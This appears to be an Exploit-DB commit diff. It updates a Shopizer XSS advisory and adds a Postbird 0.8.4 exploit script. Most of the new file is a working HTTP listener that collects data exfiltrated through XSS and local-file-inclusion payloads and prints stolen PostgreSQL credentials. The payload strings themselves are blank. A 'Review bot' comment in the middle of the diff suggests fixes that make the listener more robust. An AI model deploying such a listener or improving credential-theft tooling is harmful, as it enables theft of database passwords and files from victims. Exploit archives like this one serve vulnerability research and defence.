diff --git a/exploits/java/webapps/49901.txt b/exploits/java/webapps/49901.txt
index f161231f4..38d1f11b1 100644
--- a/exploits/java/webapps/49901.txt
+++ b/exploits/java/webapps/49901.txt
@@ -4,6 +4,7 @@
# Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0
+# CVE: CVE-2021-33561, CVE-2021-33562
Stored XSS - 'customer_name' Administration
@@ -16,6 +17,7 @@ Steps to reproduce:
3. Change customer name to and save it
4. Open "Customers" -> XSS payload will trigger
+Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)
Reflected XSS - 'ref' parameter
diff --git a/exploits/multiple/webapps/49910.py b/exploits/multiple/webapps/49910.py
new file mode 100755
index 000000000..20d43acee
--- /dev/null
+++ b/exploits/multiple/webapps/49910.py
@@ -0,0 +1,88 @@
+# Exploit Title: Postbird 0.8.4 - Javascript Injection
+# Date: [26 May 2021]
+# Exploit Author: Debshubra Chakraborty
+# Vendor Homepage: https://github.com/paxa/postbird
+# Software Link: https://www.electronjs.org/apps/postbird
+# Version: 0.8.4
+# Tested on: Linux
+# CVE : CVE-2021-33570
+
+"""
+XSS Payload
+
+
+LFI Payload
+
+
+PostgreSQL Password Stealing Payload
+
+
+"""
+
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import urllib.parse
+import re
+
+hostName = '0.0.0.0'
+serverPort = 5555
+
+class MyServer(BaseHTTPRequestHandler):
+ def do_GET(self):
+ self.send_response(200)
+ parse(urllib.parse.unquote(self.requestline))
+
+ def log_message(self, format, *args):
+ return
+
+
+def parse(data):
+ expression = re.search('\S+=', data)
+ attr = expression.group()
+
+ if attr[2:len(attr)-1] == 'file':
+ data = data[12:len(data)-11]
+ data = data.rsplit('\\n')
+ print(f'\n[+] File received from LFI: \n\n')
+ for output in data:
+ print(output)
+
+ elif attr[2:len(attr)-1] == 'xss':
+ data = data[11:len(data)-10]
+ print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
+
+ elif attr[2:len(attr)-1] == 'credentials':
+ pos = re.search('{"\S+:', data)
+ data = data[pos.start():len(data)-11]
+ for i in range(2, len(data), 1):
+ if data[i] == '"':
+ pos = i
+ break
+
+ host = data[2:pos]
+ data = data[14:]
+ data = data.rsplit(',')
+ print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
+ for output in data:
+ print(output)
+
+ else:
+ print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
+
+
+def main():
+ global hostName, serverPort
+ webServer = HTTPServer((hostName, serverPort), MyServer)
+ print("Server started http://%s:%s" % (hostName, serverPort))
+
+ try:
+ webServer.serve_forever()
+
+ except KeyboardInterrupt:
+ pass
+
+ webServer.server_close()
+ print("\nServer stopped.")
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
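Review bot: `parse()` uses the results of `re.search(...)` without a None check (`expression.group()`, and `pos.start()` in the `credentials` branch), so any request line that lacks the expected `name=` token raises AttributeError inside the handler. Because `hostName = '0.0.0.0'` binds every interface, unrelated traffic can reach that path. Guard with `if expression is None: return` (and the same for `pos`), and write the patterns as raw strings, `r'\S+='` and `r'{"\S+:'`, since `'\S'` in a plain literal is an invalid escape that newer Python versions warn about. The decoded request line is also printed verbatim; `print(repr(output))` would keep control characters in network-supplied data from being interpreted by the terminal. Separately, `do_GET` calls `send_response(200)` but never `self.end_headers()`, so the response is left incomplete.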
diff --git a/files_exploits.csv b/files_exploits.csv
index d2efa3b60..b5c6ea524 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44073,3 +44073,4 @@ id,file,description,date,author,type,platform,port
49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
+49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,